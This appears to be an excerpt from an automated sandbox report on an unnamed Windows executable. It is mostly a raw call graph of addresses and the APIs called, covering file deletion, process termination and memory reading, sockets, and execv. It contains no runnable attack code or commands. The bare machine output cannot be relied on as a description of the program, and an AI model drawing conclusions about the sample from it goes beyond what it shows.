_stat 5693->5694 5694->5568 5695->5568 5697 40ed50 5696->5697 5699 40ed8a 5696->5699 5698 40ed6b _read 5697->5698 5697->5699 5698->5697 5698->5699 5700 40ed9d 5699->5700 5710 40f0a0 fprintf _errno 5699->5710 5700->5590 5705 40e6bd 5702->5705 5706 40e6f4 fprintf 5702->5706 5704 40e707 5707 40e746 5704->5707 5708 40e719 fprintf 5704->5708 5705->5704 5705->5706 5706->5605 5707->5605 5708->5605 5711 40f0e2 fprintf 5710->5711 5712 40f0d2 perror 5710->5712 5714 405600 4 API calls 5711->5714 5717 405600 5712->5717 5716 40f0fb 5714->5716 5716->5700 5718 405623 5717->5718 5719 405609 _close _unlink 5717->5719 5720 4055b0 free free 5718->5720 5719->5718 5721 40562a 5720->5721 5721->5700 5723 405154 5722->5723 5724 40512c _errno 5722->5724 5727 405194 5723->5727 5729 404e70 _stat 5723->5729 5725 4053c3 5724->5725 5726 405137 5724->5726 5725->5652 5728 404f70 5 API calls 5726->5728 5732 405258 5727->5732 5742 4051ae fprintf 5727->5742 5730 405141 _stat 5728->5730 5731 40516c 5729->5731 5730->5723 5730->5724 5731->5727 5733 404f70 5 API calls 5731->5733 5734 405367 _chmod _unlink 5732->5734 5735 40526b fprintf 5732->5735 5737 40517d _stat 5733->5737 5734->5725 5736 405389 fprintf perror 5734->5736 5738 4052f1 5735->5738 5739 40529f _fileno _isatty 5735->5739 5736->5652 5737->5725 5737->5727 5741 4052fb _isctype 5738->5741 5743 405312 5738->5743 5739->5738 5740 4052ba fprintf fflush fgets 5739->5740 5740->5738 5741->5743 5742->5652 5743->5734 5745 405335 fprintf 5743->5745 5746 405352 5745->5746 5746->5652 5748 404eb8 5747->5748 5748->5657 5750 404fb7 5749->5750 5751 404f9a 5749->5751 5753 4040c0 _strlwr 5750->5753 5752 404fa9 5751->5752 5764 40f070 fprintf 5751->5764 5752->5652 5755 404fbd 5753->5755 5760 404fd0 5755->5760 5765 40f070 fprintf 5755->5765 5757 405042 strrchr 5757->5760 5758 405060 strcspn 5758->5760 5759 405094 strrchr 5761 4050ac 5759->5761 5762 405020 5759->5762 5760->5757 5760->5758 5760->5759 5760->5762 5766 40f070 fprintf 5761->5766 5762->5652 5762->5762 5768 405424 _chmod 5767->5768 5769 40553d 5767->5769 5768->5678 5768->5679 5769->5768 5770 405576 5769->5770 5771 405558 fprintf 5769->5771 5770->5768 5772 405592 perror 5770->5772 5771->5770 5772->5768 5775 406b50 5774->5775 5776 406ac7 5774->5776 5775->5318 5777 406acd strncpy 5776->5777 5778 406af1 _mkdir 5776->5778 5777->5776 5779 406b13 strchr 5778->5779 5780 406b06 _errno 5778->5780 5779->5777 5782 406b26 5779->5782 5780->5779 5781 406b31 _errno 5780->5781 5783 406a40 2 API calls 5781->5783 5782->5318 5783->5775 5787 402470 5784->5787 5786 402555 _stat 5786->5278 5787->5786 5789 407d8b 5788->5789 5790 407e68 FindFirstFileA 5789->5790 5791 4080b3 5790->5791 5792 407f0a 5790->5792 5791->5286 5793 407f7f FindNextFileA 5792->5793 5795 407f20 realloc 5792->5795 5793->5792 5794 407f96 FindClose 5793->5794 5794->5791 5796 407fa9 5794->5796 5795->5792 5797 4071d0 8 API calls 5796->5797 5798 407fb5 5797->5798 5799 407fc2 5798->5799 5800 407fd7 5798->5800 5808 4075e0 5799->5808 5838 407ac0 qsort CreateFileA 5800->5838 5803 40807e 5804 408086 ??3@YAXPAX 5803->5804 5805 40808f free Sleep 5803->5805 5804->5805 5805->5286 5806 407fd2 5806->5803 5807 408004 SetFileAttributesA DeleteFileA 5806->5807 5807->5803 5807->5807 5809 407624 malloc 5808->5809 5810 40760e 5808->5810 5811 407650 5809->5811 5812 40765c SetFileAttributesA CreateFileA 5809->5812 5810->5809 5811->5806 5813 4076ae MessageBoxA 5812->5813 5834 4076c7 5812->5834 5814 407a40 free 5813->5814 5814->5806 5815 407972 CloseHandle qsort 5817 407a31 5815->5817 5818 4079a2 5815->5818 5816 4076fe _ftol SendMessageA 5820 4071d0 8 API calls 5816->5820 5819 4074d0 9 API calls 5817->5819 5818->5817 5821 4079ae SetDlgItemTextA ??2@YAPAXI 5818->5821 5822 407a39 5819->5822 5820->5834 5852 407290 CreateFileA 5821->5852 5822->5814 5824 4079f5 5869 4074d0 CreateFileA 5824->5869 5825 4077d4 bsearch 5826 407844 SetFilePointer 5825->5826 5825->5834 5829 407937 MessageBoxA CloseHandle ??3@YAXPAX 5826->5829 5826->5834 5827 407800 SetFilePointer 5827->5834 5828 407812 SetFilePointer 5828->5834 5829->5814 5831 4078f6 5831->5815 5832 407a1b ??3@YAXPAX 5832->5814 5833 40790e MessageBoxA CloseHandle ??3@YAXPAX 5833->5814 5834->5815 5834->5816 5834->5825 5834->5827 5834->5828 5834->5831 5834->5833 5836 4078b0 WriteFile 5834->5836 5836->5833 5837 4078c7 ??3@YAXPAX 5836->5837 5837->5834 5839 407b0e MessageBoxA 5838->5839 5847 407b2f 5838->5847 5839->5806 5840 407d01 CloseHandle 5841 4074d0 9 API calls 5840->5841 5846 407cb5 5841->5846 5842 407b4d _ftol SendMessageA SetFilePointer 5843 407c9a MessageBoxA CloseHandle 5842->5843 5842->5847 5843->5846 5844 4071d0 8 API calls 5844->5847 5846->5806 5847->5840 5847->5842 5847->5843 5847->5844 5848 407c40 WriteFile 5847->5848 5849 407cd0 MessageBoxA CloseHandle ??3@YAXPAX 5848->5849 5850 407c53 ??3@YAXPAX 5848->5850 5849->5806 5850->5842 5851 407c7d 5850->5851 5851->5840 5853 4072c1 MessageBoxA 5852->5853 5854 4072dd SetFileAttributesA CreateFileA 5852->5854 5853->5824 5855 407331 5854->5855 5856 40730e MessageBoxA CloseHandle 5854->5856 5857 40740b CloseHandle CloseHandle SetFileAttributesA DeleteFileA MoveFileA 5855->5857 5858 40734d _ftol SendMessageA ??2@YAPAXI 5855->5858 5856->5824 5857->5824 5859 40738c SetFilePointer 5858->5859 5860 40744f MessageBoxA 5858->5860 5861 4073a2 ReadFile 5859->5861 5862 407463 MessageBoxA 5859->5862 5863 40749c CloseHandle CloseHandle DeleteFileA 5860->5863 5861->5862 5864 4073be WriteFile 5861->5864 5862->5863 5866 407493 ??3@YAXPAX 5862->5866 5863->5824 5864->5862 5867 4073da ??3@YAXPAX 5864->5867 5866->5863 5867->5858 5868 407407 5867->5868 5868->5857 5870 407511 WriteFile 5869->5870 5871 4074f9 MessageBoxA 5869->5871 5872 40752d MessageBoxA CloseHandle 5870->5872 5876 40754e 5870->5876 5871->5832 5872->5832 5873 407575 WriteFile 5874 4075aa MessageBoxA CloseHandle 5873->5874 5875 4075cb CloseHandle 5873->5875 5874->5832 5875->5832 5876->5873 6105 40e220 6115 40e410 6105->6115 6107 40e23d 6108 40e3e7 6107->6108 6109 40ed10 11 API calls 6107->6109 6129 40ee10 6107->6129 6111 40ee10 4 API calls 6108->6111 6109->6107 6112 40e3ec 6111->6112 6113 40e409 6112->6113 6133 40f070 fprintf 6112->6133 6116 40e428 6115->6116 6117 40ed10 11 API calls 6116->6117 6118 40e465 6116->6118 6117->6116 6119 40e46d 6118->6119 6120 40ed10 11 API calls 6118->6120 6122 40e4ab 6119->6122 6134 40f070 fprintf 6119->6134 6120->6119 6123 40ed10 11 API calls 6122->6123 6125 40e505 6122->6125 6128 40e517 6122->6128 6123->6122 6124 40e596 6124->6107 6125->6128 6135 40f070 fprintf 6125->6135 6126 40ed10 11 API calls 6126->6128 6128->6124 6128->6126 6130 40ee47 6129->6130 6131 40ee19 6129->6131 6130->6107 6131->6130 6132 40ee70 4 API calls 6131->6132 6132->6130 6179 4068e0 6180 406916 6179->6180 6181 4068e9 fprintf 6179->6181 6181->6180 6182 405ee0 6183 405f0d 6182->6183 6187 405f49 6182->6187 6184 40ed10 11 API calls 6183->6184 6183->6187 6184->6183 6185 405fa6 6186 40ed10 11 API calls 6186->6187 6187->6186 6190 405f98 6187->6190 6188 40ed10 11 API calls 6188->6190 6189 40ee10 4 API calls 6189->6190 6190->6185 6190->6188 6190->6189 6208 40dca0 6209 40dcb5 6208->6209 6210 40dccb 6208->6210 6212 40dd39 6209->6212 6213 40dd07 fprintf 6209->6213 6211 40ed10 11 API calls 6210->6211 6211->6209 6214 40dd65 fprintf 6212->6214 6219 40dd9d 6212->6219 6213->6212 6215 40de43 _read 6215->6219 6216 40f0a0 8 API calls 6216->6219 6217 40e1dd 6218 40e1fb 6217->6218 6220 40ee70 4 API calls 6217->6220 6219->6215 6219->6216 6219->6217 6221 40f070 fprintf 6219->6221 6222 40ee70 _write _write fprintf perror 6219->6222 6220->6218 6221->6219 6222->6219 6223 4084a0 WSAGetLastError 6224 4084b6 6223->6224 6225 408539 6223->6225 6224->6225 6227 4084ba 6224->6227 6226 40862a closesocket socket 6225->6226 6316 408a10 wvsprintfA lstrlen WriteFile 6225->6316 6229 408653 6226->6229 6230 408665 6226->6230 6231 4084fd 6227->6231 6313 408a10 wvsprintfA lstrlen WriteFile 6227->6313 6235 406a40 2 API calls 6229->6235 6232 408200 11 API calls 6230->6232 6233 406a40 2 API calls 6231->6233 6237 40866d bind 6232->6237 6238 40850a EndDialog closesocket 6233->6238 6234 408552 6317 408a10 wvsprintfA lstrlen WriteFile 6234->6317 6240 40865d 6235->6240 6243 408698 6237->6243 6244 4086cd 6237->6244 6246 4089e8 EndDialog 6240->6246 6241 4084cf 6314 408a10 wvsprintfA lstrlen WriteFile 6241->6314 6248 406a40 2 API calls 6243->6248 6249 4086f4 gethostbyname 6244->6249 6253 4086df inet_addr 6244->6253 6245 408566 6318 408a10 wvsprintfA lstrlen WriteFile 6245->6318 6247 4084e4 6315 408a10 wvsprintfA lstrlen WriteFile 6247->6315 6252 4086a2 EndDialog closesocket 6248->6252 6254 408701 rand 6249->6254 6255 408746 6249->6255 6257 408764 htons connect 6253->6257 6254->6257 6255->6257 6259 408755 inet_addr 6255->6259 6256 408580 6260 4085a3 6256->6260 6261 40858b 6256->6261 6264 408793 WSAGetLastError 6257->6264 6265 4088e4 6257->6265 6259->6257 6320 408a10 wvsprintfA lstrlen WriteFile 6260->6320 6319 408a10 wvsprintfA lstrlen WriteFile 6261->6319 6266 4087a9 6264->6266 6267 408800 6264->6267 6270 406930 9 API calls 6265->6270 6323 408a10 wvsprintfA lstrlen WriteFile 6266->6323 6273 406a40 2 API calls 6267->6273 6268 40859b 6268->6226 6269 4085b4 6321 408a10 wvsprintfA lstrlen WriteFile 6269->6321 6274 4088f7 6270->6274 6277 4088b6 EndDialog closesocket 6273->6277 6280 408904 htonl 6274->6280 6275 4087b4 6324 408a10 wvsprintfA lstrlen WriteFile 6275->6324 6276 4085d2 6276->6268 6279 4085df inet_ntoa 6276->6279 6322 408a10 wvsprintfA lstrlen WriteFile 6279->6322 6281 407180 4 API calls 6280->6281 6284 40892f 6281->6284 6282 4087c8 6325 408a10 wvsprintfA lstrlen WriteFile 6282->6325 6286 408940 6284->6286 6288 4070b0 194 API calls 6284->6288 6289 4089ae closesocket 6286->6289 6299 406930 9 API calls 6286->6299 6287 4087e2 6290 408808 6287->6290 6293 4087f0 6287->6293 6288->6286 6291 4089e0 6289->6291 6292 4089cf _close 6289->6292 6294 408810 6290->6294 6295 408829 6290->6295 6298 4080d0 98 API calls 6291->6298 6297 406e30 3 API calls 6292->6297 6326 408a10 wvsprintfA lstrlen WriteFile 6293->6326 6327 408a10 wvsprintfA lstrlen WriteFile 6294->6327 6328 408a10 wvsprintfA lstrlen WriteFile 6295->6328 6297->6291 6298->6246 6303 408971 6299->6303 6302 40883a 6329 408a10 wvsprintfA lstrlen WriteFile 6302->6329 6306 40897e htonl 6303->6306 6305 408858 6305->6267 6307 408865 inet_ntoa 6305->6307 6308 407180 4 API calls 6306->6308 6330 408a10 wvsprintfA lstrlen WriteFile 6307->6330 6310 40899a 6308->6310 6310->6289 6311 4070b0 194 API calls 6310->6311 6312 4089ab 6311->6312 6312->6289 6313->6241 6314->6247 6315->6231 6316->6234 6317->6245 6318->6256 6319->6268 6320->6269 6321->6276 6322->6276 6323->6275 6324->6282 6325->6287 6326->6267 6327->6267 6328->6302 6329->6305 6330->6305 6343 40f520 _read 6344 40f543 6343->6344 6345 406724 6346 405ac0 free 6345->6346 6347 40672f 6346->6347 6348 405ac0 free 6347->6348 6349 406739 6348->6349 5877 40d470 5883 40d4d0 5877->5883 5879 40d489 5880 40d4ca 5879->5880 5886 40d5c0 5879->5886 5893 40ee70 _write 5879->5893 5898 40d4f0 5883->5898 5887 40d5da 5886->5887 5889 40d695 5887->5889 5908 40d6b0 5887->5908 5889->5879 5891 40d615 5891->5889 5892 40d6b0 12 API calls 5891->5892 5921 40dc20 5891->5921 5892->5891 5894 40eeb2 5893->5894 5895 40ee92 5893->5895 5894->5879 5896 40ee9c _write 5895->5896 5960 40f100 fprintf perror 5895->5960 5896->5894 5896->5895 5901 40d500 5898->5901 5904 40d520 5901->5904 5905 40d4d5 5904->5905 5906 40d53e 5904->5906 5905->5879 5906->5905 5907 40ed10 11 API calls 5906->5907 5907->5906 5909 40d6b9 5908->5909 5911 40d6ed 5908->5911 5928 40d760 5909->5928 5912 40d520 11 API calls 5911->5912 5914 40d756 5912->5914 5914->5891 5915 40d6cc 5915->5891 5917 40d6dd 5943 40dac0 5917->5943 5919 40d6e2 5920 40d790 12 API calls 5919->5920 5920->5911 5922 40dc41 5921->5922 5923 40d520 11 API calls 5922->5923 5924 40dc77 5923->5924 5925 40dc98 5924->5925 5926 40d760 11 API calls 5924->5926 5925->5891 5927 40dc87 5926->5927 5927->5891 5929 40d520 11 API calls 5928->5929 5930 40d6c0 5929->5930 5930->5915 5931 40d790 5930->5931 5932 40d760 11 API calls 5931->5932 5933 40d79d 5932->5933 5934 40d7a6 5933->5934 5941 40d7eb 5933->5941 5935 40d760 11 API calls 5934->5935 5937 40d7ac 5935->5937 5936 40d86a 5955 40d8b0 5936->5955 5937->5917 5940 40d520 11 API calls 5940->5941 5941->5936 5941->5940 5942 40d760 11 API calls 5941->5942 5942->5941 5944 40d760 11 API calls 5943->5944 5945 40dac9 5944->5945 5946 40dad2 5945->5946 5953 40db0a 5945->5953 5948 40d760 11 API calls 5946->5948 5947 40dbd4 5950 40d8b0 fprintf 5947->5950 5949 40dad9 5948->5949 5949->5919 5952 40dc10 5950->5952 5951 40d520 11 API calls 5951->5953 5952->5919 5953->5947 5953->5951 5954 40d760 11 API calls 5953->5954 5954->5953 5956 40d8cc 5955->5956 5958 40d89f 5956->5958 5959 40f070 fprintf 5956->5959 5958->5917 5961 408c70 5962 408cbd SendDlgItemMessageA 5961->5962 5963 408c7d 5961->5963 5967 408ced 5962->5967 5964 408d70 5963->5964 5965 408ca7 EndDialog 5963->5965 5966 408c8b 5963->5966 5966->5964 5968 408c92 EndDialog 5966->5968 5967->5967 5969 408d54 SendDlgItemMessageA ShowWindow 5967->5969 5970 408d3e EndDialog 5967->5970 5969->5964 6331 408ab0 6332 408ad3 SendDlgItemMessageA GetDlgItem SendMessageA 6331->6332 6333 408abb 6331->6333 6334 408c3d _beginthreadex 6332->6334 6335 408b30 6332->6335 6335->6334 6410 40ebf0 _errno 6411 40ec56 6410->6411 6412 40ec0b 6410->6412 6413 40ec7a 6411->6413 6414 40ec5b _errno 6411->6414 6412->6414 6417 40ee70 4 API calls 6412->6417 6415 40ec62 6414->6415 6416 40ec8d 6414->6416 6418 40f0a0 8 API calls 6415->6418 6419 40ec2a _read 6417->6419 6420 40ec67 6418->6420 6419->6411 6419->6412 4815 40f5bf __set_app_type __p__fmode __p__commode 4816 40f62e 4815->4816 4817 40f642 4816->4817 4818 40f636 __setusermatherr 4816->4818 4827 40f72a _controlfp 4817->4827 4818->4817 4820 40f647 _initterm __getmainargs _initterm 4821 40f69b GetStartupInfoA 4820->4821 4823 40f6cf GetModuleHandleA 4821->4823 4828 40a8f0 _strcmpi 4823->4828 4826 40f6f3 exit _XcptFilter 4827->4820 4829 40a967 _strcmpi 4828->4829 4830 40a92c _snprintf GetDesktopWindow MessageBoxA 4828->4830 4831 40a976 4829->4831 4830->4831 5010 402420 GetModuleFileNameA 4831->5010 4833 40a990 time srand GetACP 4834 40aa16 4833->4834 4835 40a9b8 rand 4833->4835 4836 40aae0 rand 4834->4836 4837 40ab3d rand 4834->4837 4839 40a9ea 4834->4839 4835->4839 4836->4839 4837->4839 4838 40abfb Sleep 5015 40a140 strspn 4838->5015 4839->4838 4840 40abe1 GetDesktopWindow MessageBoxA 4839->4840 4840->4838 4842 40c308 4840->4842 4842->4826 4844 40ac24 _strcmpi 4845 40ac53 _strcmpi 4844->4845 4849 40ac3d 4844->4849 4846 40ac7c _strcmpi 4845->4846 4845->4849 4847 40ac9d _strcmpi 4846->4847 4846->4849 4848 40acbe _strcmpi 4847->4848 4847->4849 4848->4849 4850 40ace4 _strcmpi 4848->4850 4849->4842 5019 40a2b0 4849->5019 4850->4849 4854 40ad81 4855 40b538 4854->4855 4859 40ade1 4854->4859 5072 40a690 4855->5072 4857 40b546 rand 4867 40b578 4857->4867 4858 40b5ae 4862 40b718 4858->4862 4863 40b67f rand 4858->4863 4858->4867 5062 40a1d0 4859->5062 4861 40b820 5054 40a770 WSAStartup 4861->5054 4865 40b721 rand 4862->4865 4866 40b78b 4862->4866 4863->4867 4864 40adec 4870 40adf4 4864->4870 4871 40ae18 _strcmpi 4864->4871 4865->4867 4866->4867 4872 40b794 rand 4866->4872 4867->4861 4868 40b809 _strcmpi 4867->4868 4868->4861 4870->4857 4870->4858 4875 40adf8 4870->4875 4876 40aeb0 _strnicmp 4871->4876 4877 40ae31 4871->4877 4872->4867 4874 40b85c 4874->4842 5057 406dc0 4874->5057 4879 40c300 MessageBoxA 4875->4879 4881 40af42 _strcmpi 4876->4881 4882 40aec7 strstr 4876->4882 4877->4876 4880 40ae36 strstr 4877->4880 4879->4842 4880->4870 4886 40ae4f strcspn 4880->4886 4884 40af55 4881->4884 4885 40af9f _strnicmp 4881->4885 4882->4870 4887 40aee0 strcspn 4882->4887 4884->4885 4890 40af5a atoi 4884->4890 4885->4870 4891 40afc3 _strcmpi 4885->4891 4886->4870 4892 40ae67 strncpy strstr 4886->4892 4887->4870 4893 40aefc strncpy strstr 4887->4893 4888 40b872 MessageBoxA WSACleanup 4888->4826 4889 40b8a3 74A4E3D0 5079 402470 4889->5079 4890->4870 4891->4870 4896 40b006 _strcmpi 4891->4896 4892->4870 4897 40ae8e atoi 4892->4897 4893->4870 4894 40af23 atoi 4893->4894 4894->4870 4899 40b019 4896->4899 4900 40b08c _strcmpi 4896->4900 4897->4870 4898 40b8c3 remove CreateFileA 4903 40b910 4898->4903 4904 40b8fe 4898->4904 4899->4900 4905 40b01e fopen 4899->4905 4901 40b0df _strcmpi 4900->4901 4902 40b09f 4900->4902 4906 40b132 _strcmpi 4901->4906 4907 40b0f2 4901->4907 4902->4870 4902->4901 4909 40b979 WSACleanup 4903->4909 4922 40b946 DialogBoxParamA 4903->4922 5080 408a10 wvsprintfA lstrlen WriteFile 4904->5080 4910 40b080 4905->4910 4911 40b03e fgets 4905->4911 4914 40b145 4906->4914 4915 40b1bf _strcmpi 4906->4915 4907->4870 4907->4906 4912 40b9c6 CloseHandle 4909->4912 4913 40b988 4909->4913 4910->4870 4916 40b056 fclose 4911->4916 4917 40b06a fclose 4911->4917 5088 40a7e0 _chmod 4912->5088 5086 408a10 wvsprintfA lstrlen WriteFile 4913->5086 4914->4915 4919 40b14a _strnicmp 4914->4919 4920 40b1d2 4915->4920 4921 40b21c _strcmpi 4915->4921 4916->4870 4917->4870 4927 40b184 _strnicmp 4919->4927 4928 40b15f 4919->4928 4920->4921 4929 40b1d7 atoi 4920->4929 4924 40b279 _strcmpi 4921->4924 4925 40b22f 4921->4925 4930 40b955 4922->4930 4931 40b95a 4922->4931 4937 40b2d6 _strcmpi 4924->4937 4938 40b28c 4924->4938 4925->4924 4936 40b234 atoi 4925->4936 4926 40b993 4939 40b9c1 4926->4939 5087 408a10 wvsprintfA lstrlen WriteFile 4926->5087 4927->4870 4940 40b199 atoi 4927->4940 4928->4927 4929->4870 5081 406de0 4930->5081 4931->4909 4941 40b969 Sleep 4931->4941 4934 40b9e5 5097 408d80 4934->5097 4935 40ba2a 4946 40ba82 4935->4946 4950 40ba3d 4935->4950 4956 40ba10 4935->4956 4936->4870 4943 40b2e9 4937->4943 4960 40b333 4937->4960 4938->4937 4942 40b291 atoi 4938->4942 4939->4912 4940->4870 4941->4909 4941->4941 4942->4870 4944 40b2ee atoi 4943->4944 4943->4960 4944->4870 4949 40baa6 4946->4949 4955 40bad6 4946->4955 4946->4956 4948 408d80 6 API calls 4957 40bb19 4948->4957 4951 40bab9 MessageBoxA 4949->4951 4949->4956 4953 408d80 6 API calls 4950->4953 4950->4956 4951->4957 4952 40b48a _strcmpi 4954 40b4a2 _strcmpi 4952->4954 4952->4960 4953->4956 4954->4960 4955->4956 4958 408d80 6 API calls 4955->4958 4956->4948 4956->4957 4961 40bb54 _open 4957->4961 4968 40bcbf 4957->4968 4958->4956 4959 40b44b atoi 4959->4960 4960->4870 4960->4952 4960->4959 4964 40b468 atoi 4960->4964 4965 40b479 atoi 4960->4965 4962 40bb72 _filelength _lseek _read 4961->4962 4963 40bc03 MessageBoxA 4961->4963 4966 40bba0 4962->4966 4967 40bbf1 _close 4962->4967 4971 40bc3a 4963->4971 4964->4960 4965->4960 4969 40bbae MessageBoxA _close 4966->4969 4970 40bbcf MessageBoxA _close 4966->4970 4967->4971 4968->4842 4973 40bd60 4968->4973 4974 40bd50 DialogBoxParamA 4968->4974 4975 40bd40 DialogBoxParamA 4968->4975 4969->4971 4970->4971 4971->4968 4978 40bc50 _spawnl 4971->4978 4973->4842 4976 40c000 4973->4976 4977 40bdc8 4973->4977 4974->4973 4975->4973 4980 40c009 sprintf 4976->4980 4981 40c02e 4976->4981 4979 40bdcd sprintf 4977->4979 4989 40bdf2 4977->4989 4987 40bc6a 4978->4987 4982 40c25b remove 4979->4982 4980->4982 4983 40c036 sprintf 4981->4983 4984 40c04e 4981->4984 4985 40c274 4982->4985 4986 40c295 4982->4986 4983->4982 4990 40c11b sprintf 4984->4990 4996 40c05b 4984->4996 5108 402570 4985->5108 4992 40c2bb 4986->4992 4993 40c29e 4986->4993 4987->4968 4988 40bcb9 MessageBoxA 4987->4988 4988->4968 4994 40be2a sprintf 4989->4994 5002 40be61 4989->5002 4990->4982 4998 40c2e1 4992->4998 4999 40c2c6 4992->4999 4997 402570 _execv 4993->4997 4994->4982 4995 40c290 4995->4879 4996->4982 4997->4995 5001 402570 _execv 4998->5001 5000 402570 _execv 4999->5000 5000->4995 5001->4995 5003 40be99 sprintf 5002->5003 5006 40bed5 5002->5006 5003->4982 5004 40bf0d sprintf 5004->4982 5006->5004 5007 40bf5f sprintf 5006->5007 5008 40bf81 5006->5008 5007->4982 5008->5004 5009 40bfe1 sprintf 5008->5009 5009->4982 5011 402448 5010->5011 5012 40246a 5010->5012 5013 40244f CharNextA 5011->5013 5014 402464 5011->5014 5012->4833 5013->5011 5014->4833 5016 40a1c4 5015->5016 5017 40a162 5015->5017 5016->4844 5016->4849 5017->5016 5018 40a1aa strspn 5017->5018 5018->5016 5018->5017 5020 40a2d1 5019->5020 5021 40a318 FindFirstFileA 5020->5021 5022 40a430 qsort 5021->5022 5034 40a33a 5021->5034 5023 40a4c5 5022->5023 5024 40a446 5022->5024 5039 40a4e0 5023->5039 5025 40a499 5024->5025 5026 40a44a 5024->5026 5029 40a4bb free 5025->5029 5031 40a49d 5025->5031 5026->5029 5030 40a44e 5026->5030 5027 40a40a FindNextFileA 5028 40a41e FindClose 5027->5028 5027->5034 5028->5022 5029->5023 5037 40a471 SetFileAttributesA DeleteFileA 5030->5037 5032 40a4a6 SetFileAttributesA DeleteFileA 5031->5032 5032->5029 5032->5032 5033 40a36d FileTimeToSystemTime 5035 40a3d2 5033->5035 5036 40a3ab realloc 5033->5036 5034->5027 5034->5033 5035->5027 5036->5035 5037->5030 5038 40a497 5037->5038 5038->5029 5111 40f590 5039->5111 5042 40a524 5113 40c320 5042->5113 5043 40a51a 5043->4854 5045 40a67e 5045->4854 5046 40a55b _strcmpi 5047 40a5b2 sprintf MessageBoxA 5046->5047 5049 40a536 5046->5049 5048 40a619 MessageBoxA 5047->5048 5047->5049 5048->5049 5049->5045 5049->5046 5049->5047 5050 40c480 OpenProcess TerminateProcess CloseHandle CloseHandle 5049->5050 5051 40a586 _strcmpi 5049->5051 5052 40c4c0 OpenProcess ReadProcessMemory CloseHandle CloseHandle 5049->5052 5053 40a665 MessageBoxA 5049->5053 5050->5049 5051->5047 5051->5049 5052->5049 5053->5049 5055 40a7c4 5054->5055 5056 40a78d GetLastError sprintf MessageBoxA 5054->5056 5055->4874 5056->4874 5123 406d20 5057->5123 5059 406dca 5060 406d20 3 API calls 5059->5060 5061 406dd4 5060->5061 5061->4888 5061->4889 5063 40a1ee _strcmpi 5062->5063 5071 40a28e 5062->5071 5064 40a210 atoi 5063->5064 5063->5071 5065 40a236 atoi 5064->5065 5066 40a227 5064->5066 5067 40a254 GlobalGetAtomNameA 5065->5067 5068 40a245 5065->5068 5066->4864 5069 40a278 _strcmpi 5067->5069 5070 40a269 5067->5070 5068->4864 5069->5071 5070->4864 5071->4864 5132 4071d0 CreateFileA 5072->5132 5074 40a763 5074->4870 5075 40a758 ??3@YAXPAX 5075->5074 5076 40a69e 5076->5074 5076->5075 5077 40a71b inet_ntoa 5076->5077 5078 40a753 5076->5078 5077->5076 5078->5075 5079->4898 5080->4903 5140 406d80 5081->5140 5084 406e00 5084->4931 5085 406d80 3 API calls 5085->5084 5086->4926 5087->4926 5145 40a880 _open 5088->5145 5090 40a7fd 5091 40a874 5090->5091 5092 40a80d strncmp 5090->5092 5094 40a822 5090->5094 5091->4934 5091->4935 5093 40a86a free 5092->5093 5092->5094 5093->5091 5095 40a82d _open 5094->5095 5095->5093 5096 40a845 _write _write _close 5095->5096 5096->5093 5150 4024d0 5097->5150 5099 408d95 5100 408da5 fgets 5099->5100 5101 408eee 5099->5101 5102 408ed6 fclose 5100->5102 5103 408dc9 atoi 5100->5103 5101->4956 5102->4956 5103->5102 5106 408de6 5103->5106 5104 408dee fgets 5105 408e32 fgets 5104->5105 5104->5106 5105->5106 5106->5104 5106->5105 5107 408ed3 5106->5107 5107->5102 5109 402591 5108->5109 5110 4025b6 _execv 5109->5110 5110->4995 5112 40a4ea GetVersionExA 5111->5112 5112->5042 5112->5043 5114 40c46a 5113->5114 5115 40c34e GetModuleHandleA 5113->5115 5114->5049 5115->5114 5116 40c363 GetProcAddress GetProcAddress GetProcAddress 5115->5116 5116->5114 5117 40c391 5116->5117 5117->5114 5118 40c454 CloseHandle 5117->5118 5121 40c3d0 5117->5121 5118->5049 5119 40c3dd lstrlen 5119->5121 5120 40c3fc lstrcpy 5120->5121 5121->5119 5121->5120 5122 40c43c CloseHandle 5121->5122 5122->5049 5128 402500 5123->5128 5125 406d3e 5126 406d47 _read _close 5125->5126 5127 406d6a 5125->5127 5126->5059 5127->5059 5131 402470 5128->5131 5130 402515 _open 5130->5125 5131->5130 5133 407213 GetFileSize 5132->5133 5134 4071f8 sprintf 5132->5134 5135 40722a ??2@YAPAXI 5133->5135 5137 407222 sprintf CloseHandle 5133->5137 5134->5076 5135->5137 5138 40725b ReadFile CloseHandle 5135->5138 5137->5076 5139 40727a 5138->5139 5139->5076 5141 402500 _open 5140->5141 5142 406d98 5141->5142 5143 406da1 _write _close 5142->5143 5144 406db8 5142->5144 5143->5144 5144->5084 5144->5085 5146 40a8a0 _lseek 5145->5146 5147 40a89c 5145->5147 5148 40a8c2 malloc _lseek _read _close 5146->5148 5149 40a8bc 5146->5149 5147->5090 5148->5090 5149->5090 5153 402470 5150->5153 5152 4024e5 fopen 5152->5099 5153->5152 6336 4066bf 6337 4066ca fprintf 6336->6337 6338 4066e8 6336->6338 6339 405ac0 free 6337->6339 6340 405ac0 free 6338->6340 6339->6338 6341 4066f5 6340->6341

                                                                              Executed Functions

                                                                              Function 0040A8F0 Relevance: 324.1, APIs: 100, Strings: 84, Instructions: 2087stringwindowsleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1739875260.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000002.00000002.1739785576.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739875260.000000000049E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739932708.00000000004A0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1739948710.00000000004A2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_400000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message_strcmpisprintf$rand$strstr$DialogParam_closeatoi$CleanupDesktopSleepWindowremovestrcspnstrncpy$CloseCreateFileHandle_filelength_lseek_open_read_snprintf_spawnl_strnicmpsrandtime
